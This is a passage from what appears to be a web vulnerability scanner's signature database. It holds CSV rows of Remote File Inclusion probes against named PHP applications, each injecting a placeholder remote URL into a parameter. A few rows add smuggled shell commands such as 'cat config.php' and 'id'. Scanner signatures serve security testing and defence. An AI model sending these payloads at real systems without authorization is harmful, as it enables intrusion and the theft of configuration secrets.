list.\",\"\",\"\"\n\"005726\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/s02.php?shopid=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005727\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/s03.php?shopid=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005728\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/s04.php?shopid=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005729\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005730\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sablonlar/gunaysoft/gunaysoft.php?sayfaid=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005731\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005732\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005733\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sample/xls2mysql/parser_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005734\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/save.php?file_save=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005735\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/saveserver.php?thisdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005736\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script//ident/index.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005737\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/_conf/core/common-tpl-vars.php?confdir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005738\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/common.inc.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005739\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/gestion/index.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005740\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/ident/disconnect.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005741\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/ident/ident.inc.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005742\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/ident/identification.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005743\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/ident/loginliste.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005744\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/ident/loginmodif.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005745\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/index.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005746\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/init/createallimagecache.php?PATH_TO_CODE=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005747\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/menu/menuadministration.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005748\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/menu/menuprincipal.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005749\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/param/param.inc.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005750\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/plugins/phpgacl/admin/index.php?path_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005751\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/template/index.php?main_page_directory=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005752\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/tick/allincludefortick.php?PATH_TO_CODE=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005753\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script/tick/test.php?PATH_TO_CODE=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005754\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005755\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script_path/cms/classes/openengine/filepool.php?oe_classpath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005756\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script_path/installation/index.php?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005757\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005758\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/scripts/check-lom.php?ETCDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005759\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/scripts/gallery.scr.php?GLOBALS[PTH][func]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005760\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/scripts/lom_update.php?ETCDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005761\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/scripts/news.scr.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005762\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/scripts/polls.scr.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005763\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/scripts/rss.scr.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005764\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/scripts/search.scr.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005765\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005766\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005767\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/scripts/weigh_keywords.php?ETCDIR=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005768\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005769\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/search.php?config[\\\"sipssys\\\"]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005770\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/search.php?id=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005771\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/search.php?insPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005772\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/search/submit.php?config[\\\"sipssys\\\"]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005773\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/search_wA.php?LIBPATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005774\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/searchbot.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005775\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/security/include/_class.security.php?PHPSECURITYADMIN_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005776\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005777\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005778\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/senetman/html/index.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005779\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/services.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005780\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/services/samples/inclusionService.php?CabronServiceFolder=@RFIURL%00\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005781\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/settings.php?P[includes]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005782\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/settings_sql.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005783\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/setup/inc/database.php?tcms_administer_site=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005784\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/setup/upgrader.php?RootDirectory=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005785\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sezhoo/SezHooTabsAndActions.php?IP=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005786\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/shop/includes/header.inc.php?dateiPfad=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005787\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/shop/index.php?action=@RFIURL?&cmd=cat%20config.php\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005788\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/shop/page.php?osCsid=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005789\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/shop/page.php?pageid=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005790\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/shoutbox.php?language=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005791\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/shoutbox.php?root=@RFIURL?cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005792\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/show.php?file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005793\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/show.php?id=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005794\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/show.php?page=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005795\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/show.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005796\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/show_archives.php?cutepath=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005797\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005798\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sid=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005799\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/signer/final.php?smiley=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005800\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/signin.php?sent=1&AMG_serverpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005801\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sinagb.php?fuss=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005802\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sinapis.php?fuss=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005803\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sitebar/Integrator.php?file=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005804\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sitebar/index.php?writerFile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005805\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sitebuilder/admin/top.php?admindir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005806\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sitemap.xml.php?dir[classes]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005807\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skin/board/default/doctype.php?dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005808\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skin/dark/template.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005809\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skin/gold/template.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005810\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skin/html/table.php?pachtofile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005811\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skin/original/template.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005812\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005813\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skins/advanced/advanced1.php?pluginpath[0]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005814\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skins/default.php?dir_inc=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005815\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skins/header.php?ote_home=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005816\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skins/phpchess/layout_admin_cfg.php?Root_Path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005817\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skins/phpchess/layout_cfg.php?Root_Path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005818\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skins/phpchess/layout_t_top.php?Root_Path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005819\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/skysilver/login.tpl.php?theme=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005820\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/slogin_lib.inc.php?slogin_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005821\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/slogin_lib.inc.php?slogin_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005822\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/smarty.php?xcart_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005823\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/smarty.php?xcart_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005824\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/smarty/smarty_class.php?_smarty_compile_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005825\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/smilies.php?config=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005826\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005827\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005828\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005829\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005830\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/snort/base_stat_common.php?BASE_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005831\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/social_game_play.php?path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005832\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005833\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/song.php?phpbb_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005834\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/source.php?bibtexrootrel=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005835\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/source/mod/rss/channeledit.php?Codebase=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005836\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/source/mod/rss/post.php?Codebase=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005837\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/source/mod/rss/view.php?Codebase=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005838\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/source/mod/rss/viewitem.php?Codebase=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005839\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/Admin/admin_cats.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005840\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/Admin/admin_edit.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005841\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/Admin/admin_import.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005842\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/Admin/admin_templates.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"005843\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/sources/functions.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 